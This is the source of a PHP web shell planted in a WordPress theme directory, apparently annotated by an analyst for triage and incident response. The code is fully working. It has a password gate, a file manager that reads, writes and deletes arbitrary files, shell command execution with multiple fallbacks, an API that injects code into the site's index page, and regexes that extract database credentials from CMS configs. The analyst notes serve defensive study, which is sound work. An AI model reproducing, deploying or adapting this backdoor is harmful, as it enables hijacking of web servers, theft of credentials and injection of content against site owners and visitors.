File: /home/u176630765/domains/ringroadhonda.com/public_html/wp-content/themes/starter-starter/healt.php
<?php
// Analyst note: this file is a password-gated PHP web shell (file manager, command runner
// and a JSON "panel" API). The notes added below are for triage and incident response.
session_start(); // the PHP session stores the 'shell_auth' flag set by the login gate below
error_reporting(0); // turns off PHP error reporting for the whole request
// Hard-coded operator password, compared as plaintext further down. Being a fixed literal,
// it can be searched for when sweeping the filesystem for other copies of this sample.
$SHELL_PASSWORD = '_11211-Q321_CYB!+_';
// === DOWNLOAD (handled before the login gate) ===
// Streams an arbitrary file to the client as an attachment. The handler sits above the
// login gate but still requires the 'shell_auth' session flag (first line of the body).
// Defender note: the requested path travels in the query string (do=download&f=<path>),
// so these requests are visible in access logs that record the full request URI.
if (isset($_GET['do']) && $_GET['do'] === 'download' && isset($_GET['f'])) {
if (!isset($_SESSION['shell_auth'])) die('Yetkisiz');
// realpath() only canonicalises the path; nothing here restricts it to a base directory,
// so any file readable by the PHP process is in scope.
$f = realpath($_GET['f']);
if ($f && is_file($f) && is_readable($f)) {
if (ob_get_level()) ob_end_clean(); // drop buffered output so only the file body is sent
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($f) . '"');
header('Content-Length: ' . filesize($f));
readfile($f);
exit;
}
die('Dosya okunamadı');
}
// === LOGIN CHECK ===
// Gate for the rest of the script: without the 'shell_auth' session flag the request either
// logs in (POST field 'pass' equal to $SHELL_PASSWORD) or receives the login form and exits.
// NOTE(review): no attempt limiting or lockout is visible in this block.
if (!empty($SHELL_PASSWORD) && !isset($_SESSION['shell_auth'])) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['pass'])) {
// Plaintext comparison against the hard-coded password; success only sets a session flag.
if ($_POST['pass'] === $SHELL_PASSWORD) {
$_SESSION['shell_auth'] = true;
} else {
$login_error = 'Hatalı şifre';
}
}
// Still unauthenticated: emit the minimal login form and stop processing.
if (!isset($_SESSION['shell_auth'])) {
?><!DOCTYPE html>
<html><head><meta charset="UTF-8"><title>Giriş</title>
<style>body{font-family:monospace;background:#fff;display:flex;justify-content:center;align-items:center;height:100vh;margin:0}
form{border:1px solid #999;padding:20px;width:300px}input[type=password]{width:100%;padding:5px;margin:8px 0;border:1px solid #999;font-family:monospace;box-sizing:border-box}
input[type=submit]{padding:5px 15px;border:1px solid #999;background:#eee;cursor:pointer;font-family:monospace}.err{color:red;font-size:12px}</style>
</head><body><form method="POST"><b>Şifre:</b><br>
<input type="password" name="pass" autofocus>
<input type="submit" value="Giriş">
<?php if(isset($login_error)) echo '<p class="err">'.$login_error.'</p>'; ?>
</form></body></html><?php
exit;
}
}
// === Panel API (HackLink Panel integration) ===
// JSON command interface selected by POST field 'cmd'. The password is re-checked on every
// call from POST field 'password', independently of the session flag.
// NOTE(review): as written, a client without an authenticated session is stopped by the
// login gate earlier in the file unless the same POST also carries a matching 'pass' field.
// Defender note: command names, arguments and the plaintext password travel in the POST
// body, which access logs typically do not record; request-body logging is needed to see them.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
$pw = $_POST['password'] ?? '';
if (!empty($SHELL_PASSWORD) && $pw !== $SHELL_PASSWORD) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Geçersiz şifre']);
exit;
}
// Liveness check for the panel: answers 'pong' and discloses the php_uname() string.
if ($cmd === 'ping') {
header('Content-Type: application/json');
echo json_encode(['status' => 'success', 'message' => 'pong', 'server' => php_uname()]);
exit;
}
// Content injection into the site's front page: writes POST field 'code' into an index file.
// Incident response: the modified file is the first writable one of index.php / index.html /
// index.htm in the document root. Inspect it directly after the opening <head> tag, directly
// before </body>, and at the very end of the file, and compare against a known-good copy.
// NOTE(review): despite its name, 'clean_inject' has no removal logic here; it requires a
// non-empty 'code' like the other commands and writes it through the footer path.
if (in_array($cmd, ['inject_footer','inject_header','inject_footer_js','inject_header_js','clean_inject'])) {
$code = $_POST['code'] ?? '';
if (empty($code)) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Kod boş']);
exit;
}
// Falls back to this script's own directory when DOCUMENT_ROOT is empty.
$doc_root = $_SERVER['DOCUMENT_ROOT'] ?: dirname(__FILE__);
$index_files = ['index.php','index.html','index.htm'];
$target = '';
foreach ($index_files as $f) {
$p = $doc_root . '/' . $f;
if (file_exists($p) && is_writable($p)) { $target = $p; break; }
}
if (!$target) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Yazılabilir index dosyası bulunamadı']);
exit;
}
$content = file_get_contents($target);
// Only command names containing 'header' take the <head> path; every other accepted
// command name takes the footer path.
$is_header = strpos($cmd, 'header') !== false;
if ($is_header) {
// Inserted after the first <head ...> tag only (limit 1).
$content = preg_replace('/(<head[^>]*>)/i', '$1' . "\n" . $code, $content, 1);
} else {
if (stripos($content, '</body>') !== false) {
// No limit here: the code is placed before every case-insensitive '</body>' match.
$content = str_ireplace('</body>', $code . "\n</body>", $content);
} else {
$content .= "\n" . $code;
}
}
file_put_contents($target, $content); // result is not checked; success is reported regardless
$rel = str_replace($doc_root, '', $target);
$proto = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$host = $_SERVER['HTTP_HOST'] ?? '';
header('Content-Type: application/json');
// The response reports the modified file back to the caller as a path and a full URL.
echo json_encode([
'status' => 'success',
'message' => 'Enjeksiyon başarılı',
'relative_path' => $rel,
'full_url' => $proto . '://' . $host . '/' . ltrim($rel, '/')
]);
exit;
}
// === Remote command execution (exec) ===
// Runs POST field 'command' through the shell, optionally from POST field 'dir', and returns
// the output as JSON. Only 'dir' is escaped; 'command' is passed through as given.
// Defender notes:
//  - The branch tries shell_exec, exec, system, popen and proc_open in turn, so hardening
//    through disable_functions should cover all of them, not just one.
//  - On the host, the observable effect is the web server / PHP user spawning shell
//    child processes.
if ($cmd === 'exec') {
$command = isset($_POST['command']) ? $_POST['command'] : '';
if (empty($command)) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Komut boş']);
exit;
}
$dir = isset($_POST['dir']) ? $_POST['dir'] : getcwd();
$full = 'cd ' . escapeshellarg($dir) . ' && ' . $command . ' 2>&1'; // stderr merged into stdout
$output = @shell_exec($full);
if ($output === null) {
// if shell_exec is disabled, try the other methods
$out_arr = [];
@exec($full, $out_arr);
$output = implode("\n", $out_arr);
if ($output === '') {
// system() prints directly, so its output is captured with an output buffer.
ob_start();
@system($full);
$output = ob_get_clean();
}
if ($output === '' || $output === false) {
$fp = @popen($full, 'r');
if ($fp) {
$output = '';
while (!feof($fp)) $output .= fread($fp, 8192);
pclose($fp);
}
}
if ($output === '' || $output === false) {
// Last fallback: runs the raw $command with $dir as working directory instead of the
// 'cd ... &&' wrapper, and reads stdout and stderr from separate pipes.
$desc = [1 => ['pipe','w'], 2 => ['pipe','w']];
$p = @proc_open($command, $desc, $pipes, $dir);
if (is_resource($p)) {
$output = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
fclose($pipes[1]); fclose($pipes[2]);
proc_close($p);
}
}
if ($output === '' || $output === false || $output === null) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Komut çalıştırılamadı (tüm yöntemler başarısız)']);
exit;
}
}
header('Content-Type: application/json');
echo json_encode(['status' => 'success', 'output' => $output]);
exit;
}
// === File write (write_file) ===
// Writes POST field 'content' to the path in POST field 'path', creating or overwriting it.
// The path is used as given, with no base-directory restriction.
// Incident response: because this can create or replace any file the PHP process may write,
// removing this one script is not sufficient; the site needs an integrity check against
// known-good copies.
if ($cmd === 'write_file') {
$path = isset($_POST['path']) ? $_POST['path'] : '';
$content = isset($_POST['content']) ? $_POST['content'] : '';
if (empty($path)) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Dosya yolu boş']);
exit;
}
$r = @file_put_contents($path, $content); // byte count on success, false on failure
header('Content-Type: application/json');
if ($r !== false) {
echo json_encode(['status' => 'success', 'message' => 'Yazıldı', 'bytes' => $r]);
} else {
echo json_encode(['status' => 'error', 'message' => 'Yazılamadı']);
}
exit;
}
// === File read (read_file) ===
// Returns the contents of the path in POST field 'path' inside a JSON response.
// Incident response: any secret readable by the PHP process (application configuration,
// database credentials, keys) should be treated as exposed and rotated.
if ($cmd === 'read_file') {
$path = isset($_POST['path']) ? $_POST['path'] : '';
if (empty($path) || !file_exists($path)) {
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Dosya bulunamadı']);
exit;
}
header('Content-Type: application/json');
echo json_encode(['status' => 'success', 'content' => file_get_contents($path)]);
exit;
}
// === Server information (info) ===
// Returns an inventory of the PHP environment as JSON: versions, OS, process user, working
// directory, document root, the disable_functions list, which command-execution functions
// are usable, presence of selected extensions, writability of /tmp and of this script's
// directory, and the open_basedir setting.
// NOTE(review): the code only reports these values; read together they amount to a survey
// of how the PHP installation is hardened.
if ($cmd === 'info') {
$disabled = str_replace(' ', '', ini_get('disable_functions'));
$exec_fns = [];
foreach (['exec','shell_exec','system','passthru','popen','proc_open'] as $fn) {
// true only when the function exists and is not named in disable_functions
$exec_fns[$fn] = function_exists($fn) && !in_array($fn, explode(',', strtolower($disabled)));
}
header('Content-Type: application/json');
echo json_encode([
'status' => 'success',
'php_version' => phpversion(),
'sapi' => php_sapi_name(),
'os' => PHP_OS,
'uname' => php_uname(),
'user' => get_current_user(),
'cwd' => getcwd(),
'doc_root' => $_SERVER['DOCUMENT_ROOT'] ?? '',
'disable_functions' => $disabled,
'exec_functions' => $exec_fns,
'extensions' => [
'FFI' => class_exists('FFI'),
'Imagick' => class_exists('Imagick'),
'curl' => extension_loaded('curl'),
'imap' => extension_loaded('imap'),
],
'tmp_writable' => is_writable('/tmp'),
'webdir_writable' => is_writable(dirname(__FILE__)),
'open_basedir' => ini_get('open_basedir'),
]);
exit;
}
// Any other 'cmd' value: report an unknown command and stop, so the HTML UI is never
// rendered for a panel API request.
header('Content-Type: application/json');
echo json_encode(['status' => 'error', 'message' => 'Bilinmeyen komut']);
exit;
}
// === HELPER FUNCTIONS ===
/**
 * Resolve the directory the file-manager UI should operate on.
 *
 * Uses the 'dir' query parameter when it canonicalises (realpath) to an existing
 * directory; otherwise falls back to the process working directory. The value is not
 * confined to any base directory.
 *
 * @return string|false Canonical directory path, or whatever getcwd() returns.
 */
function get_dir() {
    if (!isset($_GET['dir'])) {
        return getcwd();
    }
    $resolved = realpath($_GET['dir']);
    return ($resolved && is_dir($resolved)) ? $resolved : getcwd();
}
/**
 * Render a byte count as a short human-readable size.
 *
 * Uses binary thresholds (1024-based) and rounds to two decimals; values below
 * 1024 are printed unchanged with a ' B' suffix.
 *
 * @param int|float $bytes Size in bytes.
 * @return string e.g. '1.5 KB', '12 B'.
 */
function fmt_size($bytes) {
    // Largest unit first so the first matching threshold wins.
    $units = [
        'GB' => 1073741824,
        'MB' => 1048576,
        'KB' => 1024,
    ];
    foreach ($units as $label => $threshold) {
        if ($bytes >= $threshold) {
            return round($bytes / $threshold, 2) . ' ' . $label;
        }
    }
    return $bytes . ' B';
}
/**
 * Format a file's permission bits as a nine-character rwx string.
 *
 * Only the owner/group/other read-write-execute bits are rendered; the file-type
 * and setuid/setgid/sticky bits are ignored.
 *
 * @param string $file Path passed to fileperms().
 * @return string e.g. 'rwxr-xr-x'.
 */
function fmt_perms($file) {
    $mode = fileperms($file);
    $letters = 'rwx';
    $out = '';
    // Walk from owner-read (bit 8, 0x0100) down to other-execute (bit 0, 0x0001).
    for ($bit = 8; $bit >= 0; $bit--) {
        $out .= ($mode & (1 << $bit)) ? $letters[(8 - $bit) % 3] : '-';
    }
    return $out;
}
/**
 * Report whether a command-line tool is on the PATH by shelling out to `which`.
 *
 * $name is concatenated into the command unescaped; the call sites visible in this file
 * pass fixed literals (wget, perl, python3, python, sudo, pkexec).
 * Defender note: the info box in the page template calls this on each render, so every
 * view of the UI makes the PHP process run several `which` lookups through the shell.
 *
 * @param string $name Tool name to look up.
 * @return bool True when `which` printed a non-empty result.
 */
function check_tool($name) {
$check = @shell_exec('which ' . $name . ' 2>/dev/null');
return !empty(trim($check ?? '')); // null (no output / call failed) counts as "not found"
}
/**
 * Report whether any database client API is available to PHP.
 *
 * @return bool True when mysqli_connect(), the legacy mysql_connect(), or the PDO
 *              class exists.
 */
function check_mysql() {
    return function_exists('mysqli_connect')
        || function_exists('mysql_connect')
        || class_exists('PDO');
}
/**
 * Pull database connection settings (host, name, user, password) out of the text of a
 * CMS configuration file using regular expressions.
 *
 * Patterns are tried in the order WordPress, Joomla, Laravel .env, Drupal; a later group
 * runs only while nothing was found yet or the database name is still empty.
 * NOTE(review): $cms is never read, and no call to this function appears in the visible
 * listing.
 * Incident response: independent of this helper, the shell can read any file the PHP
 * process can, so database credentials stored in such files should be rotated.
 *
 * @param string $content Text of a configuration file.
 * @param mixed  $cms     Unused.
 * @return array Keys host/name/user/pass when at least one pattern matched, else [].
 */
function extract_credentials($content, $cms) {
$creds = ['host' => '', 'name' => '', 'user' => '', 'pass' => ''];
$found = false;
// WordPress (wp-config.php)
if (preg_match("/DB_HOST['\"]\\s*,\\s*['\"](.+?)['\"]/", $content, $m)) { $creds['host'] = $m[1]; $found = true; }
if (preg_match("/DB_NAME['\"]\\s*,\\s*['\"](.+?)['\"]/", $content, $m)) { $creds['name'] = $m[1]; $found = true; }
if (preg_match("/DB_USER['\"]\\s*,\\s*['\"](.+?)['\"]/", $content, $m)) { $creds['user'] = $m[1]; $found = true; }
if (preg_match("/DB_PASSWORD['\"]\\s*,\\s*['\"](.*)['\"]/", $content, $m)) { $creds['pass'] = $m[1]; $found = true; }
// Joomla (configuration.php)
if (!$found || empty($creds['name'])) {
if (preg_match('/\$host\s*=\s*[\'"](.+?)[\'"]/', $content, $m)) { $creds['host'] = $m[1]; $found = true; }
if (preg_match('/\$db\s*=\s*[\'"](.+?)[\'"]/', $content, $m)) { $creds['name'] = $m[1]; $found = true; }
if (preg_match('/\$user\s*=\s*[\'"](.+?)[\'"]/', $content, $m)) { $creds['user'] = $m[1]; $found = true; }
if (preg_match('/\$password\s*=\s*[\'"](.*?)[\'"]/', $content, $m)) { $creds['pass'] = $m[1]; $found = true; }
}
// Laravel .env
if (!$found || empty($creds['name'])) {
if (preg_match('/DB_HOST=(.+)/', $content, $m)) { $creds['host'] = trim($m[1]); $found = true; }
if (preg_match('/DB_DATABASE=(.+)/', $content, $m)) { $creds['name'] = trim($m[1]); $found = true; }
if (preg_match('/DB_USERNAME=(.+)/', $content, $m)) { $creds['user'] = trim($m[1]); $found = true; }
if (preg_match('/DB_PASSWORD=(.*)/', $content, $m)) { $creds['pass'] = trim($m[1]); $found = true; }
}
// Drupal (settings.php) - 'database', 'username', 'password', 'host'
if (!$found || empty($creds['name'])) {
if (preg_match("/['\"]database['\"]\\s*=>\\s*['\"](.+?)['\"]/", $content, $m)) { $creds['name'] = $m[1]; $found = true; }
if (preg_match("/['\"]username['\"]\\s*=>\\s*['\"](.+?)['\"]/", $content, $m)) { $creds['user'] = $m[1]; $found = true; }
if (preg_match("/['\"]password['\"]\\s*=>\\s*['\"](.*?)['\"]/", $content, $m)) { $creds['pass'] = $m[1]; $found = true; }
if (preg_match("/['\"]host['\"]\\s*=>\\s*['\"](.+?)['\"]/", $content, $m)) { $creds['host'] = $m[1]; $found = true; }
}
return $found ? $creds : [];
}
// Request-wide state for the file-manager UI (reached only with an authenticated session).
$dir = get_dir(); // working directory from ?dir=, falling back to getcwd()
$self = basename(__FILE__);
$msg = ''; // status text shown in the banner
$msg_type = ''; // 'ok' or 'err'; used as a CSS class suffix in the template
// === ACTIONS ===
// The action name comes from ?do= or, failing that, from POST field 'do'.
$do = $_GET['do'] ?? $_POST['do'] ?? '';
// Logout
if ($do === 'logout') {
session_destroy();
header('Location: ' . $self);
exit;
}
// New file: creates an empty file named by POST field 'name' under the current directory,
// refusing to overwrite an existing path.
if ($do === 'newfile' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$name = trim($_POST['name'] ?? '');
if ($name) {
$path = $dir . '/' . $name; // the name is joined as given, without further checks
if (file_exists($path)) {
$msg = 'Bu isimde dosya zaten var'; $msg_type = 'err';
} else {
if (@file_put_contents($path, '') !== false) {
$msg = 'Dosya oluşturuldu: ' . $name; $msg_type = 'ok';
} else {
$msg = 'Dosya oluşturulamadı'; $msg_type = 'err';
}
}
}
}
// New folder: creates a directory named by POST field 'name' under the current directory
// with mode 0755, refusing when the path already exists.
if ($do === 'newfolder' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$name = trim($_POST['name'] ?? '');
if ($name) {
$path = $dir . '/' . $name;
if (file_exists($path)) {
$msg = 'Bu isimde klasör zaten var'; $msg_type = 'err';
} else {
if (@mkdir($path, 0755)) {
$msg = 'Klasör oluşturuldu: ' . $name; $msg_type = 'ok';
} else {
$msg = 'Klasör oluşturulamadı'; $msg_type = 'err';
}
}
}
}
// Delete: removes the file or directory named in ?f=.
// Defender note: this destructive action is triggered by a plain GET (do=delete&f=<path>),
// so the deleted path is visible in access logs that record the query string.
if ($do === 'delete' && isset($_GET['f'])) {
$f = realpath($_GET['f']);
if ($f) {
if (is_dir($f)) {
// Directory delete (empty directory)
if (@rmdir($f)) {
$msg = 'Klasör silindi: ' . basename($f); $msg_type = 'ok';
} else {
// Recursive delete for a non-empty directory.
// rm_rf() is declared conditionally, only when this branch is reached.
function rm_rf($d) {
$items = array_diff(scandir($d), ['.','..']);
foreach ($items as $item) {
$path = $d . '/' . $item;
is_dir($path) ? rm_rf($path) : @unlink($path);
}
return @rmdir($d);
}
if (rm_rf($f)) {
$msg = 'Klasör silindi: ' . basename($f); $msg_type = 'ok';
} else {
$msg = 'Klasör silinemedi'; $msg_type = 'err';
}
}
} else {
if (@unlink($f)) {
$msg = 'Dosya silindi: ' . basename($f); $msg_type = 'ok';
} else {
$msg = 'Dosya silinemedi'; $msg_type = 'err';
}
}
}
}
// Rename: renames the existing path in POST field 'old' to POST field 'new_name' within
// the same parent directory, refusing when the destination already exists.
if ($do === 'rename' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$old = $_POST['old'] ?? '';
$new_name = trim($_POST['new_name'] ?? '');
if ($old && $new_name) {
$old = realpath($old); // false when the source does not exist
if ($old) {
$new_path = dirname($old) . '/' . $new_name;
if (file_exists($new_path)) {
$msg = 'Bu isimde dosya/klasör zaten var'; $msg_type = 'err';
} else {
if (@rename($old, $new_path)) {
$msg = 'Yeniden adlandırıldı: ' . $new_name; $msg_type = 'ok';
} else {
$msg = 'Yeniden adlandırılamadı'; $msg_type = 'err';
}
}
}
}
}
// Chmod: applies the octal mode string in POST field 'perm' to the path in POST field 'file'.
// Incident response: permissions on site files may have been loosened through this action,
// so file modes are worth reviewing as part of clean-up.
if ($do === 'chmod' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$f = $_POST['file'] ?? '';
$perm = $_POST['perm'] ?? '';
if ($f && $perm) {
$f = realpath($f);
if ($f) {
$oct = octdec($perm); // e.g. the string '0755' becomes the integer mode 0755
if (@chmod($f, $oct)) {
$msg = 'İzin değiştirildi: ' . $perm; $msg_type = 'ok';
} else {
$msg = 'İzin değiştirilemedi'; $msg_type = 'err';
}
}
}
}
// Save edited file: overwrites the existing file in POST field 'file' with POST field
// 'content'. realpath() returns false for a missing path, so this action only replaces
// files that already exist.
// Incident response: existing site files may have been altered in place; verify them
// against known-good copies rather than assuming only new files were added.
if ($do === 'saveedit' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$f = $_POST['file'] ?? '';
$content = $_POST['content'] ?? '';
if ($f) {
$f = realpath($f);
if ($f) {
if (@file_put_contents($f, $content) !== false) {
$msg = 'Dosya kaydedildi: ' . basename($f); $msg_type = 'ok';
} else {
$msg = 'Dosya kaydedilemedi'; $msg_type = 'err';
}
}
}
}
// File upload: stores the uploaded file in the current directory under the base name the
// client supplied, refusing to overwrite. No check on file type or extension is made.
// Incident response: further files may have been placed anywhere the PHP process can
// write, so look for other unexpected files, not only this script.
if ($do === 'upload' && $_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_FILES['upload_file']) && $_FILES['upload_file']['error'] === UPLOAD_ERR_OK) {
$upload_name = basename($_FILES['upload_file']['name']); // strips any directory part
$upload_dest = $dir . '/' . $upload_name;
if (file_exists($upload_dest)) {
$msg = 'Bu isimde dosya zaten var: ' . $upload_name; $msg_type = 'err';
} else {
if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $upload_dest)) {
$msg = 'Dosya yüklendi: ' . $upload_name . ' (' . fmt_size(filesize($upload_dest)) . ')'; $msg_type = 'ok';
} else {
$msg = 'Dosya yüklenemedi'; $msg_type = 'err';
}
}
} elseif (isset($_FILES['upload_file'])) {
// Map PHP upload error codes to display messages; unlisted codes get a generic message.
$err_codes = [1=>'Dosya çok büyük (php.ini)',2=>'Dosya çok büyük (form)',3=>'Kısmen yüklendi',4=>'Dosya seçilmedi',6=>'Geçici klasör yok',7=>'Diske yazılamadı'];
$msg = 'Yükleme hatası: ' . ($err_codes[$_FILES['upload_file']['error']] ?? 'Bilinmeyen hata'); $msg_type = 'err';
}
}
// Terminal command execution: runs POST field 'tcmd' through shell_exec() from the current
// directory and keeps the output for display in the page. Unlike the panel API 'exec'
// command, this path uses shell_exec() only and has no fallback.
// Defender note: as with the API, the host-level signal is the PHP process spawning a shell.
$terminal_output = '';
if ($do === 'terminal' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$tcmd = $_POST['tcmd'] ?? '';
if ($tcmd) {
$full_cmd = 'cd ' . escapeshellarg($dir) . ' && ' . $tcmd . ' 2>&1'; // only $dir is escaped
$terminal_output = @shell_exec($full_cmd);
if ($terminal_output === null) $terminal_output = 'Komut çalıştırılamadı (shell_exec devre dışı olabilir)';
}
}
// === SERVER INFORMATION ===
// Values shown in the info box at the top of every page: server and client address, web
// server software, uname string, effective user and UID, PHP version, disable_functions.
$server_ip = $_SERVER['SERVER_ADDR'] ?? gethostbyname(gethostname());
$your_ip = $_SERVER['REMOTE_ADDR'] ?? '?';
$web_server = $_SERVER['SERVER_SOFTWARE'] ?? '?';
$system = php_uname();
// Prefer the POSIX effective user when the posix functions exist; otherwise fall back to
// get_current_user().
$user_info = function_exists('posix_getpwuid') ? posix_getpwuid(posix_geteuid()) : null;
$user_name = $user_info ? $user_info['name'] : get_current_user();
$user_uid = $user_info ? $user_info['uid'] : (function_exists('posix_geteuid') ? posix_geteuid() : '?');
$php_ver = phpversion();
$disabled = ini_get('disable_functions') ?: 'Yok';
?><!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title><?php echo htmlspecialchars($dir); ?></title>
<style>
*{margin:0;padding:0;box-sizing:border-box}
body{font-family:monospace;font-size:13px;background:#fff;color:#000;padding:10px}
a{color:#00c;text-decoration:none}a:hover{text-decoration:underline}
table{width:100%;border-collapse:collapse;margin:8px 0}
th,td{border:1px solid #ccc;padding:4px 8px;text-align:left}
th{background:#eee;font-weight:bold}
tr:hover{background:#f5f5f5}
input[type=text],input[type=password],textarea,select{border:1px solid #999;padding:3px 5px;font-family:monospace;font-size:13px}
input[type=submit],button{border:1px solid #999;background:#eee;padding:3px 10px;cursor:pointer;font-family:monospace;font-size:13px}
input[type=submit]:hover,button:hover{background:#ddd}
.info-box{border:1px solid #ccc;padding:8px;margin-bottom:10px;background:#fafafa;word-break:break-all;line-height:1.8}
.path-box{border:1px solid #ccc;padding:6px 8px;margin-bottom:10px;background:#f5f5f5;word-break:break-all}
.msg-ok{border:1px solid #090;background:#dfd;padding:6px 8px;margin-bottom:10px}
.msg-err{border:1px solid #900;background:#fdd;padding:6px 8px;margin-bottom:10px}
.tools{margin-bottom:10px;padding:6px 0;border-bottom:1px solid #ccc}
.tools form{display:inline-block;margin-right:10px;margin-bottom:4px}
.terminal-box{border:1px solid #ccc;padding:8px;margin-bottom:10px;background:#fafafa}
.terminal-output{background:#111;color:#0f0;padding:10px;font-family:monospace;white-space:pre-wrap;word-break:break-all;max-height:400px;overflow-y:auto;margin-top:6px}
.top-bar{display:flex;justify-content:space-between;align-items:center;margin-bottom:10px;padding-bottom:6px;border-bottom:1px solid #ccc}
.dir-link{margin-right:3px}
</style>
</head>
<body>
<div class="top-bar">
<div><b>BÜROKRAT Shell</b></div>
<a href="?do=logout">[Çıkış]</a>
</div>
<!-- SUNUCU BİLGİLERİ -->
<div class="info-box">
<b>Server IP:</b> <?php echo htmlspecialchars($server_ip); ?> | <b>Your IP:</b> <?php echo htmlspecialchars($your_ip); ?><br>
<b>Web Server:</b> <?php echo htmlspecialchars($web_server); ?><br>
<b>System:</b> <?php echo htmlspecialchars($system); ?><br>
<b>User:</b> <?php echo htmlspecialchars($user_name); ?> (<?php echo htmlspecialchars($user_uid); ?>)<br>
<b>PHP Version:</b> <?php echo htmlspecialchars($php_ver); ?><br>
<b>Disable Function:</b> <?php echo htmlspecialchars($disabled); ?><br>
<b>MySQL:</b> <?php echo check_mysql() ? 'ON' : 'OFF'; ?> |
<b>cURL:</b> <?php echo function_exists('curl_init') ? 'ON' : 'OFF'; ?> |
<b>WGET:</b> <?php echo check_tool('wget') ? 'ON' : 'OFF'; ?> |
<b>Perl:</b> <?php echo check_tool('perl') ? 'ON' : 'OFF'; ?> |
<b>Python:</b> <?php echo (check_tool('python3') || check_tool('python')) ? 'ON' : 'OFF'; ?> |
<b>Sudo:</b> <?php echo check_tool('sudo') ? 'ON' : 'OFF'; ?> |
<b>Pkexec:</b> <?php echo check_tool('pkexec') ? 'ON' : 'OFF'; ?>
</div>
<?php if ($msg): ?>
<div class="msg-<?php echo $msg_type; ?>"><?php echo htmlspecialchars($msg); ?></div>
<?php endif; ?>
<?php
// === FILE EDIT SCREEN ===
// Loads the file named in ?f= for display in a textarea; the form that follows posts the
// edited text back to the 'saveedit' action.
if ($do === 'edit' && isset($_GET['f'])):
$ef = realpath($_GET['f']);
if ($ef && is_file($ef)):
$econtent = @file_get_contents($ef);
?>
<div style="margin-bottom:10px">
<b>Düzenle:</b> <?php echo htmlspecialchars($ef); ?>
| <a href="?dir=<?php echo urlencode($dir); ?>">[Geri]</a>
</div>
<form method="POST" action="?do=saveedit&dir=<?php echo urlencode($dir); ?>">
<input type="hidden" name="do" value="saveedit">
<input type="hidden" name="file" value="<?php echo htmlspecialchars($ef); ?>">
<textarea name="content" style="width:100%;height:500px"><?php echo htmlspecialchars($econtent); ?></textarea><br>
<input type="submit" value="Kaydet" style="margin-top:6px">
<a href="?dir=<?php echo urlencode($dir); ?>" style="margin-left:10px">[İptal]</a>
</form>
<?php
else:
echo '<div class="msg-err">Dosya okunamadı</div>';
endif;
// === RENAME SCREEN ===
// Shows the rename form for the path in ?f=; the form posts to the 'rename' action.
elseif ($do === 'renameform' && isset($_GET['f'])):
$rf = realpath($_GET['f']);
if ($rf):
?>
<div style="margin-bottom:10px">
<b>Yeniden Adlandır:</b> <?php echo htmlspecialchars($rf); ?>
| <a href="?dir=<?php echo urlencode($dir); ?>">[Geri]</a>
</div>
<form method="POST" action="?do=rename&dir=<?php echo urlencode($dir); ?>">
<input type="hidden" name="do" value="rename">
<input type="hidden" name="old" value="<?php echo htmlspecialchars($rf); ?>">
Yeni ad: <input type="text" name="new_name" value="<?php echo htmlspecialchars(basename($rf)); ?>" size="40">
<input type="submit" value="Kaydet">
</form>
<?php
endif;
// === CHMOD SCREEN ===
// Shows the permission form for the path in ?f=; the form posts to the 'chmod' action.
elseif ($do === 'chmodform' && isset($_GET['f'])):
$cf = realpath($_GET['f']);
if ($cf):
// Current mode as the last four octal digits, used to pre-fill the form field.
$cur_perm = substr(sprintf('%o', fileperms($cf)), -4);
?>
<div style="margin-bottom:10px">
<b>İzin Değiştir:</b> <?php echo htmlspecialchars($cf); ?>
| <a href="?dir=<?php echo urlencode($dir); ?>">[Geri]</a>
</div>
<form method="POST" action="?do=chmod&dir=<?php echo urlencode($dir); ?>">
<input type="hidden" name="do" value="chmod">
<input type="hidden" name="file" value="<?php echo htmlspecialchars($cf); ?>">
İzin (örn: 0755): <input type="text" name="perm" value="<?php echo $cur_perm; ?>" size="6">
<input type="submit" value="Uygula">
</form>
<?php
endif;
// === MAIN FILE MANAGER ===
// Default view when no edit/rename/chmod form was requested.
else:
?>
<!-- DİZİN YOLU -->
<div class="path-box">
<b>Dizin:</b>
<?php
// Breadcrumb: split the current directory into segments and emit one ?dir= link per
// cumulative path. Backslashes are normalised to forward slashes first.
$parts = explode('/', str_replace('\\', '/', $dir));
$built = '';
foreach ($parts as $i => $part) {
// A leading empty segment means the path is absolute: emit the root link.
if ($part === '' && $i === 0) {
$built = '/';
echo '<a class="dir-link" href="?dir=' . urlencode('/') . '">/</a>';
continue;
}
if ($part === '') continue;
$built = rtrim($built, '/') . '/' . $part;
echo '<a class="dir-link" href="?dir=' . urlencode($built) . '">' . htmlspecialchars($part) . '</a>/';
}
?>
</div>
<!-- ARAÇ ÇUBUĞU -->
<div class="tools">
<form method="POST" action="?do=newfile&dir=<?php echo urlencode($dir); ?>">
<input type="hidden" name="do" value="newfile">
<input type="text" name="name" placeholder="dosya_adi.txt" size="20">
<input type="submit" value="Yeni Dosya">
</form>
<form method="POST" action="?do=newfolder&dir=<?php echo urlencode($dir); ?>">
<input type="hidden" name="do" value="newfolder">
<input type="text" name="name" placeholder="klasor_adi" size="20">
<input type="submit" value="Yeni Klasör">
</form>
<form method="POST" action="?do=upload&dir=<?php echo urlencode($dir); ?>" enctype="multipart/form-data">
<input type="hidden" name="do" value="upload">
